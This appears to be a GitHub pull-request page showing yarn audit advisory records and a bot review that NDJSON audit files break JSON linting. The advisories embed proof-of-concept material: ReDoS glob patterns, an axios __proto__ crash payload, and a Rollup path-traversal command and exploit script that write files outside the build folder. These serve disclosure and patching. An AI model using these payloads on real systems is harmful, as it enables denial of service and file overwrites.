{"type":"auditAdvisory","data":{"resolution":{"id":1115552,"path":"laravel-vite-plugin>vite-plugin-full-reload>picomatch","dev":false,"optional":false,"bundled":false},"advisory":{"findings":[{"version":"2.3.1","paths":["laravel-vite-plugin>vite-plugin-full-reload>picomatch"]}],"found_by":null,"deleted":null,"references":"- https://github.com/micromatch/picomatch/security/advisories/GHSA-c2c7-rcm5-vvqj\n- https://github.com/micromatch/picomatch/commit/5eceecd27543b8e056b9307d69e105ea03618a7d\n- https://nvd.nist.gov/vuln/detail/CVE-2026-33671\n- https://github.com/advisories/GHSA-c2c7-rcm5-vvqj","created":"2026-03-25T21:12:07.000Z","id":1115552,"npm_advisory_id":null,"overview":"### Impact\n`picomatch` is vulnerable to Regular Expression Denial of Service (ReDoS) when processing crafted extglob patterns. Certain patterns using extglob quantifiers such as `+()` and `*()`, especially when combined with overlapping alternatives or nested extglobs, are compiled into regular expressions that can exhibit catastrophic backtracking on non-matching input.\n\nExamples of problematic patterns include `+(a|aa)`, `+(*|?)`, `+(+(a))`, `*(+(a))`, and `+(+(+(a)))`. In local reproduction, these patterns caused multi-second event-loop blocking with relatively short inputs. For example, `+(a|aa)` compiled to `^(?:(?=.)(?:a|aa)+)$` and took about 2 seconds to reject a 41-character non-matching input, while nested patterns such as `+(+(a))` and `*(+(a))` took around 29 seconds to reject a 33-character input on a modern M1 MacBook.\n\nApplications are impacted when they allow untrusted users to supply glob patterns that are passed to `picomatch` for compilation or matching. In those cases, an attacker can cause excessive CPU consumption and block the Node.js event loop, resulting in a denial of service. Applications that only use trusted, developer-controlled glob patterns are much less likely to be exposed in a security-relevant way.\n\n### Patches\nThis issue is fixed in picomatch 4.0.4, 3.0.2 and 2.3.2.\n\nUsers should upgrade to one of these versions or later, depending on their supported release line.\n\n### Workarounds\nIf upgrading is not immediately possible, avoid passing untrusted glob patterns to `picomatch`.\n\nPossible mitigations include:\n- disable extglob support for untrusted patterns by using `noextglob: true`\n- reject or sanitize patterns containing nested extglobs or extglob quantifiers such as `+()` and `*()`\n- enforce strict allowlists for accepted pattern syntax\n- run matching in an isolated worker or separate process with time and resource limits\n- apply application-level request throttling and input validation for any endpoint that accepts glob patterns\n\n### Resources\n- Picomatch repository: https://github.com/micromatch/picomatch\n- `lib/parse.js` and `lib/constants.js` are involved in generating the vulnerable regex forms\n- Comparable ReDoS precedent: CVE-2024-4067 (`micromatch`)\n- Comparable generated-regex precedent: CVE-2024-45296 (`path-to-regexp`)","reported_by":null,"title":"Picomatch has a ReDoS vulnerability via extglob quantifiers","metadata":null,"cves":["CVE-2026-33671"],"access":"public","severity":"high","module_name":"picomatch","vulnerable_versions":"<2.3.2","github_advisory_id":"GHSA-c2c7-rcm5-vvqj","recommendation":"Upgrade to version 2.3.2 or later","patched_versions":">=2.3.2","updated":"2026-03-27T21:36:14.000Z","cvss":{"score":7.5,"vectorString":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H"},"cwe":["CWE-1333"],"url":"https://github.com/advisories/GHSA-c2c7-rcm5-vvqj"}}}
{"type":"auditSummary","data":{"vulnerabilities":{"info":0,"low":0,"moderate":3,"high":5,"critical":0},"dependencies":156,"devDependencies":0,"optionalDependencies":0,"totalDependencies":156}}
Copy link
Copy Markdown
Contributor

@coderabbitai coderabbitai bot Mar 30, 2026

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

⚠️ Potential issue | 🟠 Major

🧩 Analysis chain

🏁 Script executed:

web_search
Yarn audit --json output format NDJSON line-delimited

Repository: InvoicePlane/InvoicePlane-v2

Length of output: 165

🏁 Script executed:

# Check if there are any audit-related files or scripts in the repo
git ls-files | grep -i audit

# Look for any scripts or tooling that processes audit files
rg -i "audit.*json|audit.*report" --type js --type json --type yaml --type toml -A 3

# Check for ESLint, Biome, or other linter configs that might validate JSON
fd -i "biome.json|eslint|prettier" -o ".json" | head -20

Repository: InvoicePlane/InvoicePlane-v2

Length of output: 50533

🏁 Script executed:

# Check for linter configs
fd -type f \( -name "biome.json" -o -name ".eslintrc*" -o -name "prettier.config.*" -o -name ".prettierrc*" \)

# Search for package.json to see if there are audit-related scripts
fd package.json -type f -exec head -100 {} \;

# Check if audit files are referenced anywhere in the codebase
rg "audit-before|audit-report" --type json --type yaml --type js -i

# Look for GitHub Actions workflows
fd "\.github" -type d

Repository: InvoicePlane/InvoicePlane-v2

Length of output: 584

🏁 Script executed:

# Check for any CI/workflow files that reference audit
fd "\.yml$|\.yaml$" .github -type f 2>/dev/null | head -5

Repository: InvoicePlane/InvoicePlane-v2

Length of output: 54

🏁 Script executed:

# Check for GitHub Actions workflows
find .github -name "*.yml" -o -name "*.yaml" 2>/dev/null | head -10

# Check for biome.json
find . -maxdepth 3 -name "biome.json" 2>/dev/null

# Search for package.json
find . -maxdepth 3 -name "package.json" 2>/dev/null | head -3

# Check for references to audit files
rg "audit-before|audit-report" -i --max-count 10

Repository: InvoicePlane/InvoicePlane-v2

Length of output: 457

🏁 Script executed:

# Check if there's a biome config that would validate JSON
cat biome.json 2>/dev/null || echo "No biome.json found"

# Check root package.json for audit-related scripts
if [ -f package.json ]; then head -50 package.json; fi

Repository: InvoicePlane/InvoicePlane-v2

Length of output: 1742

🏁 Script executed:

# Check if any CI workflow references the audit files or JSON linting
rg "biome|lint|audit" .github/workflows/ -i

# Check if there are any issues or discussions about JSON parsing
find . -name "*.md" -type f | xargs rg "audit.*json|ndjson|jsonl" -i 2>/dev/null | head -20

Repository: InvoicePlane/InvoicePlane-v2

Length of output: 2337

🏁 Script executed:

# Search for any error messages or notes about the audit files
rg "End of file|parse.*error" --type md --type txt -i | head -10

# Check the actual structure of the files more carefully
head -1 audit-before.json | wc -c
tail -1 audit-before.json | wc -c

Repository: InvoicePlane/InvoicePlane-v2

Length of output: 80

🏁 Script executed:

# Check if audit files are in .gitignore
cat .gitignore | grep -i audit

# Check if audit files are actually committed to the repo
git ls-files | grep -E "audit.*json"

# Get the actual workflow file to see the full context
cat .github/workflows/yarn-update.yml | head -100

Repository: InvoicePlane/InvoicePlane-v2

Length of output: 3533

🏁 Script executed:

# Check if these files are actually in git history
git log --all --full-history -- "audit-before.json" "audit-report.json" | head -20

# Check git status to see if they're tracked
git status --short | grep -i audit

# Verify they're in .gitignore
cat .gitignore | grep -E "audit.*json"

Repository: InvoicePlane/InvoicePlane-v2

Length of output: 776

🏁 Script executed:

# Double check - are they in gitignore?
grep "^audit-before.json$" .gitignore && echo "Found in gitignore" || echo "NOT in gitignore"
grep "^audit-report.json$" .gitignore && echo "Found in gitignore" || echo "NOT in gitignore"

# Are they currently tracked in git?
git ls-files | grep "audit.*json"

# Check if Biome actually validates JSON files by default - search docs or config
cat biome.json | grep -i json -A 5 -B 5

Repository: InvoicePlane/InvoicePlane-v2

Length of output: 283

🏁 Script executed:

# Let's test if NDJSON in a .json file would actually cause Biome to fail
# First check Biome version
cat biome.json | grep schema

Repository: InvoicePlane/InvoicePlane-v2

Length of output: 133

🏁 Script executed:

# Check if Biome would validate .json files - search for any biome issues or configs
# about JSON validation
cat biome.json | grep -A 20 "json"

# Let's see if there's any CI that runs biome
grep -r "biome" .github/workflows/ 2>/dev/null

# Try to understand if this NDJSON actually causes issues
# Parse the first line to verify it's valid JSON
head -1 audit-before.json | python3 -m json.tool > /dev/null 2>&1 && echo "Line 1 is valid JSON" || echo "Line 1 is NOT valid JSON"

# Try to parse the entire file as single JSON
python3 -m json.tool audit-before.json > /dev/null 2>&1 && echo "File parses as single JSON" || echo "File does NOT parse as single JSON (expected for NDJSON)"

# Check if NDJSON parsing works
python3 << 'EOF'
import json
valid_lines = 0
try:
    with open('audit-before.json', 'r') as f:
        for line_num, line in enumerate(f, 1):
            if line.strip():
                try:
                    json.loads(line)
                    valid_lines += 1
                except json.JSONDecodeError as e:
                    print(f"Line {line_num} JSON error: {e}")
                    break
    print(f"Successfully parsed {valid_lines} valid JSON objects from NDJSON file")
except Exception as e:
    print(f"Error: {e}")
EOF

Repository: InvoicePlane/InvoicePlane-v2

Length of output: 821

🏁 Script executed:

# Check if there are any biome reports or CI failures
git log --all --oneline -- audit-before.json audit-report.json | head -10

# Check if Biome would validate JSON by default
# Look for any JSON-specific rules
cat biome.json | grep -i "json" -B 5 -A 5

# Check if the files ever caused any CI issues
grep -r "audit-before\|audit-report" .github/ --include="*.yml" -A 2 -B 2 | grep -i "error\|fail" || echo "No error/fail patterns found"

Repository: InvoicePlane/InvoicePlane-v2

Length of output: 679

🏁 Script executed:

# Let me check if Biome 2.4.9 actually validates JSON files
# Check the Biome JSON configuration more comprehensively
grep -A 50 '"json"' biome.json || echo "No JSON config section found"

# Check if there's a separate json section in biome config
python3 << 'EOF'
import json
with open('biome.json', 'r') as f:
    config = json.load(f)
    if 'json' in config:
        print("JSON config found:")
        print(json.dumps(config['json'], indent=2))
    else:
        print("No 'json' section in biome.json")
EOF

Repository: InvoicePlane/InvoicePlane-v2

Length of output: 132

🏁 Script executed:

# Final check: run Biome on the audit files to see if it actually reports errors
# This will tell us if the review comment's claim about parse errors is accurate
if command -v biome &> /dev/null; then
    biome check audit-before.json audit-report.json 2>&1 | head -20
else
    echo "Biome not installed in sandbox"
fi

Repository: InvoicePlane/InvoicePlane-v2

Length of output: 38788

Fix the audit file format: these are NDJSON, not JSON.

Both audit-before.json and audit-report.json contain line-delimited JSON from yarn audit --json, which Biome is already flagging with "End of file expected" errors starting at line 2. Either rename them to .jsonl or .ndjson and exclude from JSON linting, or wrap all records in a single JSON array before committing.

🧰 Tools
🪛 Biome (2.4.9)

[error] 2-2: End of file expected

(parse)

[error] 3-3: End of file expected

(parse)

[error] 4-4: End of file expected

(parse)

[error] 5-5: End of file expected

(parse)

[error] 6-6: End of file expected

(parse)

[error] 7-7: End of file expected

(parse)

[error] 8-8: End of file expected

(parse)

[error] 9-9: End of file expected

(parse)

🤖 Prompt for AI Agents 
Verify each finding against the current code and only fix it if needed.

In `@audit-before.json` around lines 1 - 9, audit-before.json and
audit-report.json contain line-delimited JSON (NDJSON) but are named/treated as
regular JSON causing lint errors; convert them to proper NDJSON or valid JSON:
either rename both files to .ndjson or .jsonl (audit-before.ndjson,
audit-report.ndjson) and update any references, or wrap the newline-delimited
records into a single JSON array; alternatively add an exclusion for these
filenames in the JSON lint/Biome config so they are not parsed as JSON. Ensure
you apply the same change for both audit-before.json and audit-report.json and
update any CI/README references so tooling continues to find them.

audit-report.json
Comment on lines +1 to +9
{"type":"auditAdvisory","data":{"resolution":{"id":1113275,"path":"axios","dev":false,"optional":false,"bundled":false},"advisory":{"findings":[{"version":"1.13.2","paths":["axios"]}],"found_by":null,"deleted":null,"references":"- https://github.com/axios/axios/security/advisories/GHSA-43fc-jf86-j433\n- https://github.com/axios/axios/pull/7369\n- https://github.com/axios/axios/commit/28c721588c7a77e7503d0a434e016f852c597b57\n- https://github.com/axios/axios/releases/tag/v1.13.5\n- https://nvd.nist.gov/vuln/detail/CVE-2026-25639\n- https://github.com/axios/axios/pull/7388\n- https://github.com/axios/axios/commit/d7ff1409c68168d3057fc3891f911b2b92616f9e\n- https://github.com/axios/axios/releases/tag/v0.30.3\n- https://github.com/advisories/GHSA-43fc-jf86-j433","created":"2026-02-09T17:46:14.000Z","id":1113275,"npm_advisory_id":null,"overview":"# Denial of Service via **proto** Key in mergeConfig\n\n### Summary\n\nThe `mergeConfig` function in axios crashes with a TypeError when processing configuration objects containing `__proto__` as an own property. An attacker can trigger this by providing a malicious configuration object created via `JSON.parse()`, causing complete denial of service.\n\n### Details\n\nThe vulnerability exists in `lib/core/mergeConfig.js` at lines 98-101:\n\n```javascript\nutils.forEach(Object.keys({ ...config1, ...config2 }), function computeConfigValue(prop) {\n const merge = mergeMap[prop] || mergeDeepProperties;\n const configValue = merge(config1[prop], config2[prop], prop);\n (utils.isUndefined(configValue) && merge !== mergeDirectKeys) || (config[prop] = configValue);\n});\n```\n\nWhen `prop` is `'__proto__'`:\n\n1. `JSON.parse('{\"__proto__\": {...}}')` creates an object with `__proto__` as an own enumerable property\n2. `Object.keys()` includes `'__proto__'` in the iteration\n3. `mergeMap['__proto__']` performs prototype chain lookup, returning `Object.prototype` (truthy object)\n4. The expression `mergeMap[prop] || mergeDeepProperties` evaluates to `Object.prototype`\n5. `Object.prototype(...)` throws `TypeError: merge is not a function`\n\nThe `mergeConfig` function is called by:\n\n- `Axios._request()` at `lib/core/Axios.js:75`\n- `Axios.getUri()` at `lib/core/Axios.js:201`\n- All HTTP method shortcuts (`get`, `post`, etc.) at `lib/core/Axios.js:211,224`\n\n### PoC\n\n```javascript\nimport axios from \"axios\";\n\nconst maliciousConfig = JSON.parse('{\"__proto__\": {\"x\": 1}}');\nawait axios.get(\"https://httpbin.org/get\", maliciousConfig);\n```\n\n**Reproduction steps:**\n\n1. Clone axios repository or `npm install axios`\n2. Create file `poc.mjs` with the code above\n3. Run: `node poc.mjs`\n4. Observe the TypeError crash\n\n**Verified output (axios 1.13.4):**\n\n```\nTypeError: merge is not a function\n at computeConfigValue (lib/core/mergeConfig.js:100:25)\n at Object.forEach (lib/utils.js:280:10)\n at mergeConfig (lib/core/mergeConfig.js:98:9)\n```\n\n**Control tests performed:**\n| Test | Config | Result |\n|------|--------|--------|\n| Normal config | `{\"timeout\": 5000}` | SUCCESS |\n| Malicious config | `JSON.parse('{\"__proto__\": {\"x\": 1}}')` | **CRASH** |\n| Nested object | `{\"headers\": {\"X-Test\": \"value\"}}` | SUCCESS |\n\n**Attack scenario:**\nAn application that accepts user input, parses it with `JSON.parse()`, and passes it to axios configuration will crash when receiving the payload `{\"__proto__\": {\"x\": 1}}`.\n\n### Impact\n\n**Denial of Service** - Any application using axios that processes user-controlled JSON and passes it to axios configuration methods is vulnerable. The application will crash when processing the malicious payload.\n\nAffected environments:\n\n- Node.js servers using axios for HTTP requests\n- Any backend that passes parsed JSON to axios configuration\n\nThis is NOT prototype pollution - the application crashes before any assignment occurs.","reported_by":null,"title":"Axios is Vulnerable to Denial of Service via __proto__ Key in mergeConfig","metadata":null,"cves":["CVE-2026-25639"],"access":"public","severity":"high","module_name":"axios","vulnerable_versions":">=1.0.0 <=1.13.4","github_advisory_id":"GHSA-43fc-jf86-j433","recommendation":"Upgrade to version 1.13.5 or later","patched_versions":">=1.13.5","updated":"2026-02-18T17:16:29.000Z","cvss":{"score":7.5,"vectorString":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H"},"cwe":["CWE-754"],"url":"https://github.com/advisories/GHSA-43fc-jf86-j433"}}}
{"type":"auditAdvisory","data":{"resolution":{"id":1113515,"path":"vite>rollup","dev":false,"optional":false,"bundled":false},"advisory":{"findings":[{"version":"4.54.0","paths":["vite>rollup"]}],"found_by":null,"deleted":null,"references":"- https://github.com/rollup/rollup/security/advisories/GHSA-mw96-cpmx-2vgc\n- https://nvd.nist.gov/vuln/detail/CVE-2026-27606\n- https://github.com/rollup/rollup/commit/c60770d7aaf750e512c1b2774989ea4596e660b2\n- https://github.com/rollup/rollup/commit/c8cf1f9c48c516285758c1e11f08a54f304fd44e\n- https://github.com/rollup/rollup/commit/d6dee5e99bb82aac0bee1df4ab9efbde455452c3\n- https://github.com/rollup/rollup/releases/tag/v2.80.0\n- https://github.com/rollup/rollup/releases/tag/v3.30.0\n- https://github.com/rollup/rollup/releases/tag/v4.59.0\n- https://github.com/advisories/GHSA-mw96-cpmx-2vgc","created":"2026-02-25T22:37:26.000Z","id":1113515,"npm_advisory_id":null,"overview":"### Summary\nThe Rollup module bundler (specifically v4.x and present in current source) is vulnerable to an Arbitrary File Write via Path Traversal. Insecure file name sanitization in the core engine allows an attacker to control output filenames (e.g., via CLI named inputs, manual chunk aliases, or malicious plugins) and use traversal sequences (`../`) to overwrite files anywhere on the host filesystem that the build process has permissions for. This can lead to persistent Remote Code Execution (RCE) by overwriting critical system or user configuration files.\n\n### Details\nThe vulnerability is caused by the combination of two flawed components in the Rollup core:\n\n1. **Improper Sanitization**: In `src/utils/sanitizeFileName.ts`, the `INVALID_CHAR_REGEX` used to clean user-provided names for chunks and assets excludes the period (`.`) and forward/backward slashes (`/`, `\\`). \n ```typescript\n // src/utils/sanitizeFileName.ts (Line 3)\n const INVALID_CHAR_REGEX = /[\\u0000-\\u001F\"#$%&*+,:;<=>?[\\]^`{|}\\u007F]/g;\n ```\n This allows path traversal sequences like `../../` to pass through the sanitizer unmodified.\n\n2. **Unsafe Path Resolution**: In `src/rollup/rollup.ts`, the `writeOutputFile` function uses `path.resolve` to combine the output directory with the \"sanitized\" filename.\n ```typescript\n // src/rollup/rollup.ts (Line 317)\n const fileName = resolve(outputOptions.dir || dirname(outputOptions.file!), outputFile.fileName);\n ```\n Because `path.resolve` follows the `../` sequences in `outputFile.fileName`, the resulting path points outside of the intended output directory. The subsequent call to `fs.writeFile` completes the arbitrary write.\n\n### PoC\nA demonstration of this vulnerability can be performed using the Rollup CLI or a configuration file.\n\n**Scenario: CLI Named Input Exploit**\n1. Target a sensitive file location (for demonstration, we will use a file in the project root called `pwned.js`).\n2. Execute Rollup with a specifically crafted named input where the key contains traversal characters:\n ```bash\n rollup --input \"a/../../pwned.js=main.js\" --dir dist\n ```\n3. **Result**: Rollup will resolve the output path for the entry chunk as `dist + a/../../pwned.js`, which resolves to the project root. The file `pwned.js` is created/overwritten outside the `dist` folder.\n\n**Reproduction Files provided :**\n* `vuln_app.js`: Isolated logic exactly replicating the sanitization and resolution bug.\n* `exploit.py`: Automated script to run the PoC and verify the file escape.\n\nvuln_app.js\n```js\nconst path = require('path');\nconst fs = require('fs');\n\n/**\n * REPLICATED ROLLUP VULNERABILITY\n * \n * 1. Improper Sanitization (from src/utils/sanitizeFileName.ts)\n * 2. Unsafe Path Resolution (from src/rollup/rollup.ts)\n */\n\nfunction sanitize(name) {\n // The vulnerability: Rollup's regex fails to strip dots and slashes, \n // allowing path traversal sequences like '../'\n return name.replace(/[\\u0000-\\u001F\"#$%&*+,:;<=>?[\\]^`{|}\\u007F]/g, '_');\n}\n\nasync function build(userSuppliedName) {\n const outputDir = path.join(__dirname, 'dist');\n const fileName = sanitize(userSuppliedName);\n\n // Vulnerability: path.resolve() follows traversal sequences in the filename\n const outputPath = path.resolve(outputDir, fileName);\n\n console.log(`[*] Target write path: ${outputPath}`);\n\n if (!fs.existsSync(path.dirname(outputPath))) {\n fs.mkdirSync(path.dirname(outputPath), { recursive: true });\n }\n\n fs.writeFileSync(outputPath, 'console.log(\"System Compromised!\");');\n console.log(`[+] File written successfully.`);\n}\n\nbuild(process.argv[2] || 'bundle.js');\n\n```\n\nexploit.py\n```py\nimport subprocess\nfrom pathlib import Path\n\ndef run_poc():\n # Target a file outside the 'dist' folder\n poc_dir = Path(__file__).parent\n malicious_filename = \"../pwned_by_rollup.js\"\n target_path = poc_dir / \"pwned_by_rollup.js\"\n\n print(f\"=== Rollup Path Traversal PoC ===\")\n print(f\"[*] Malicious Filename: {malicious_filename}\")\n \n # Trigger the vulnerable app\n subprocess.run([\"node\", \"poc/vuln_app.js\", malicious_filename])\n\n if target_path.exists():\n print(f\"[SUCCESS] File escaped 'dist' folder!\")\n print(f\"[SUCCESS] Created: {target_path}\")\n # target_path.unlink() # Cleanup\n else:\n print(\"[FAILED] Exploit did not work.\")\n\nif __name__ == \"__main__\":\n run_poc()\n```\n\n## POC \n```rollup --input \"bypass/../../../../../../../Users/vaghe/OneDrive/Desktop/pwned_desktop.js=main.js\" --dir dist```\n\n<img width=\"1918\" height=\"1111\" alt=\"image\" src=\"https://github.com/user-attachments/assets/3474eb7c-9c4b-4acd-9103-c70596b490d4\" />\n\n\n\n### Impact\nThis is a **High** level of severity vulnerability.\n* **Arbitrary File Write**: Attackers can overwrite sensitive files like `~/.ssh/authorized_keys`, `.bashrc`, or system binaries if the build process has sufficient privileges.\n* **Supply Chain Risk**: Malicious third-party plugins or dependencies can use this to inject malicious code into other parts of a developer's machine during the build phase.\n* **User Impact**: Developers running builds on untrusted repositories are at risk of system compromise.","reported_by":null,"title":"Rollup 4 has Arbitrary File Write via Path Traversal","metadata":null,"cves":["CVE-2026-27606"],"access":"public","severity":"high","module_name":"rollup","vulnerable_versions":">=4.0.0 <4.59.0","github_advisory_id":"GHSA-mw96-cpmx-2vgc","recommendation":"Upgrade to version 4.59.0 or later","patched_versions":">=4.59.0","updated":"2026-02-25T22:37:27.000Z","cvss":{"score":0,"vectorString":null},"cwe":["CWE-22"],"url":"https://github.com/advisories/GHSA-mw96-cpmx-2vgc"}}}
{"type":"auditAdvisory","data":{"resolution":{"id":1115551,"path":"vite>picomatch","dev":false,"optional":false,"bundled":false},"advisory":{"findings":[{"version":"4.0.3","paths":["vite>picomatch","vite>tinyglobby>picomatch"]}],"found_by":null,"deleted":null,"references":"- https://github.com/micromatch/picomatch/security/advisories/GHSA-3v7f-55p6-f55p\n- https://github.com/micromatch/picomatch/commit/4516eb521f13a46b2fe1a1d2c9ef6b20ddc0e903\n- https://nvd.nist.gov/vuln/detail/CVE-2026-33672\n- https://github.com/advisories/GHSA-3v7f-55p6-f55p","created":"2026-03-25T21:13:39.000Z","id":1115551,"npm_advisory_id":null,"overview":"### Impact\npicomatch is vulnerable to a **method injection vulnerability (CWE-1321)** affecting the `POSIX_REGEX_SOURCE` object. Because the object inherits from `Object.prototype`, specially crafted POSIX bracket expressions (e.g., `[[:constructor:]]`) can reference inherited method names. These methods are implicitly converted to strings and injected into the generated regular expression.\n\nThis leads to **incorrect glob matching behavior (integrity impact)**, where patterns may match unintended filenames. The issue does **not enable remote code execution**, but it can cause security-relevant logic errors in applications that rely on glob matching for filtering, validation, or access control.\n\nAll users of affected `picomatch` versions that process untrusted or user-controlled glob patterns are potentially impacted.\n\n### Patches\n\nThis issue is fixed in picomatch 4.0.4, 3.0.2 and 2.3.2.\n\nUsers should upgrade to one of these versions or later, depending on their supported release line.\n\n### Workarounds\n\nIf upgrading is not immediately possible, avoid passing untrusted glob patterns to picomatch.\n\nPossible mitigations include:\n- Sanitizing or rejecting untrusted glob patterns, especially those containing POSIX character classes like `[[:...:]]`.\n- Avoiding the use of POSIX bracket expressions if user input is involved.\n- Manually patching the library by modifying `POSIX_REGEX_SOURCE` to use a null prototype:\n\n ```js\n const POSIX_REGEX_SOURCE = {\n __proto__: null,\n alnum: 'a-zA-Z0-9',\n alpha: 'a-zA-Z',\n // ... rest unchanged\n };\n \n### Resources\n\n- fix for similar issue: https://github.com/micromatch/picomatch/pull/144\n- picomatch repository https://github.com/micromatch/picomatch","reported_by":null,"title":"Picomatch: Method Injection in POSIX Character Classes causes incorrect Glob Matching","metadata":null,"cves":["CVE-2026-33672"],"access":"public","severity":"moderate","module_name":"picomatch","vulnerable_versions":">=4.0.0 <4.0.4","github_advisory_id":"GHSA-3v7f-55p6-f55p","recommendation":"Upgrade to version 4.0.4 or later","patched_versions":">=4.0.4","updated":"2026-03-27T21:36:25.000Z","cvss":{"score":5.3,"vectorString":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N"},"cwe":["CWE-1321"],"url":"https://github.com/advisories/GHSA-3v7f-55p6-f55p"}}}
{"type":"auditAdvisory","data":{"resolution":{"id":1115551,"path":"vite>tinyglobby>picomatch","dev":false,"optional":false,"bundled":false},"advisory":{"findings":[{"version":"4.0.3","paths":["vite>picomatch","vite>tinyglobby>picomatch"]}],"found_by":null,"deleted":null,"references":"- https://github.com/micromatch/picomatch/security/advisories/GHSA-3v7f-55p6-f55p\n- https://github.com/micromatch/picomatch/commit/4516eb521f13a46b2fe1a1d2c9ef6b20ddc0e903\n- https://nvd.nist.gov/vuln/detail/CVE-2026-33672\n- https://github.com/advisories/GHSA-3v7f-55p6-f55p","created":"2026-03-25T21:13:39.000Z","id":1115551,"npm_advisory_id":null,"overview":"### Impact\npicomatch is vulnerable to a **method injection vulnerability (CWE-1321)** affecting the `POSIX_REGEX_SOURCE` object. Because the object inherits from `Object.prototype`, specially crafted POSIX bracket expressions (e.g., `[[:constructor:]]`) can reference inherited method names. These methods are implicitly converted to strings and injected into the generated regular expression.\n\nThis leads to **incorrect glob matching behavior (integrity impact)**, where patterns may match unintended filenames. The issue does **not enable remote code execution**, but it can cause security-relevant logic errors in applications that rely on glob matching for filtering, validation, or access control.\n\nAll users of affected `picomatch` versions that process untrusted or user-controlled glob patterns are potentially impacted.\n\n### Patches\n\nThis issue is fixed in picomatch 4.0.4, 3.0.2 and 2.3.2.\n\nUsers should upgrade to one of these versions or later, depending on their supported release line.\n\n### Workarounds\n\nIf upgrading is not immediately possible, avoid passing untrusted glob patterns to picomatch.\n\nPossible mitigations include:\n- Sanitizing or rejecting untrusted glob patterns, especially those containing POSIX character classes like `[[:...:]]`.\n- Avoiding the use of POSIX bracket expressions if user input is involved.\n- Manually patching the library by modifying `POSIX_REGEX_SOURCE` to use a null prototype:\n\n ```js\n const POSIX_REGEX_SOURCE = {\n __proto__: null,\n alnum: 'a-zA-Z0-9',\n alpha: 'a-zA-Z',\n // ... rest unchanged\n };\n \n### Resources\n\n- fix for similar issue: https://github.com/micromatch/picomatch/pull/144\n- picomatch repository https://github.com/micromatch/picomatch","reported_by":null,"title":"Picomatch: Method Injection in POSIX Character Classes causes incorrect Glob Matching","metadata":null,"cves":["CVE-2026-33672"],"access":"public","severity":"moderate","module_name":"picomatch","vulnerable_versions":">=4.0.0 <4.0.4","github_advisory_id":"GHSA-3v7f-55p6-f55p","recommendation":"Upgrade to version 4.0.4 or later","patched_versions":">=4.0.4","updated":"2026-03-27T21:36:25.000Z","cvss":{"score":5.3,"vectorString":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N"},"cwe":["CWE-1321"],"url":"https://github.com/advisories/GHSA-3v7f-55p6-f55p"}}}
{"type":"auditAdvisory","data":{"resolution":{"id":1115554,"path":"vite>picomatch","dev":false,"optional":false,"bundled":false},"advisory":{"findings":[{"version":"4.0.3","paths":["vite>picomatch","vite>tinyglobby>picomatch"]}],"found_by":null,"deleted":null,"references":"- https://github.com/micromatch/picomatch/security/advisories/GHSA-c2c7-rcm5-vvqj\n- https://github.com/micromatch/picomatch/commit/5eceecd27543b8e056b9307d69e105ea03618a7d\n- https://nvd.nist.gov/vuln/detail/CVE-2026-33671\n- https://github.com/advisories/GHSA-c2c7-rcm5-vvqj","created":"2026-03-25T21:12:07.000Z","id":1115554,"npm_advisory_id":null,"overview":"### Impact\n`picomatch` is vulnerable to Regular Expression Denial of Service (ReDoS) when processing crafted extglob patterns. Certain patterns using extglob quantifiers such as `+()` and `*()`, especially when combined with overlapping alternatives or nested extglobs, are compiled into regular expressions that can exhibit catastrophic backtracking on non-matching input.\n\nExamples of problematic patterns include `+(a|aa)`, `+(*|?)`, `+(+(a))`, `*(+(a))`, and `+(+(+(a)))`. In local reproduction, these patterns caused multi-second event-loop blocking with relatively short inputs. For example, `+(a|aa)` compiled to `^(?:(?=.)(?:a|aa)+)$` and took about 2 seconds to reject a 41-character non-matching input, while nested patterns such as `+(+(a))` and `*(+(a))` took around 29 seconds to reject a 33-character input on a modern M1 MacBook.\n\nApplications are impacted when they allow untrusted users to supply glob patterns that are passed to `picomatch` for compilation or matching. In those cases, an attacker can cause excessive CPU consumption and block the Node.js event loop, resulting in a denial of service. Applications that only use trusted, developer-controlled glob patterns are much less likely to be exposed in a security-relevant way.\n\n### Patches\nThis issue is fixed in picomatch 4.0.4, 3.0.2 and 2.3.2.\n\nUsers should upgrade to one of these versions or later, depending on their supported release line.\n\n### Workarounds\nIf upgrading is not immediately possible, avoid passing untrusted glob patterns to `picomatch`.\n\nPossible mitigations include:\n- disable extglob support for untrusted patterns by using `noextglob: true`\n- reject or sanitize patterns containing nested extglobs or extglob quantifiers such as `+()` and `*()`\n- enforce strict allowlists for accepted pattern syntax\n- run matching in an isolated worker or separate process with time and resource limits\n- apply application-level request throttling and input validation for any endpoint that accepts glob patterns\n\n### Resources\n- Picomatch repository: https://github.com/micromatch/picomatch\n- `lib/parse.js` and `lib/constants.js` are involved in generating the vulnerable regex forms\n- Comparable ReDoS precedent: CVE-2024-4067 (`micromatch`)\n- Comparable generated-regex precedent: CVE-2024-45296 (`path-to-regexp`)","reported_by":null,"title":"Picomatch has a ReDoS vulnerability via extglob quantifiers","metadata":null,"cves":["CVE-2026-33671"],"access":"public","severity":"high","module_name":"picomatch","vulnerable_versions":">=4.0.0 <4.0.4","github_advisory_id":"GHSA-c2c7-rcm5-vvqj","recommendation":"Upgrade to version 4.0.4 or later","patched_versions":">=4.0.4","updated":"2026-03-27T21:36:14.000Z","cvss":{"score":7.5,"vectorString":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H"},"cwe":["CWE-1333"],"url":"https://github.com/advisories/GHSA-c2c7-rcm5-vvqj"}}}
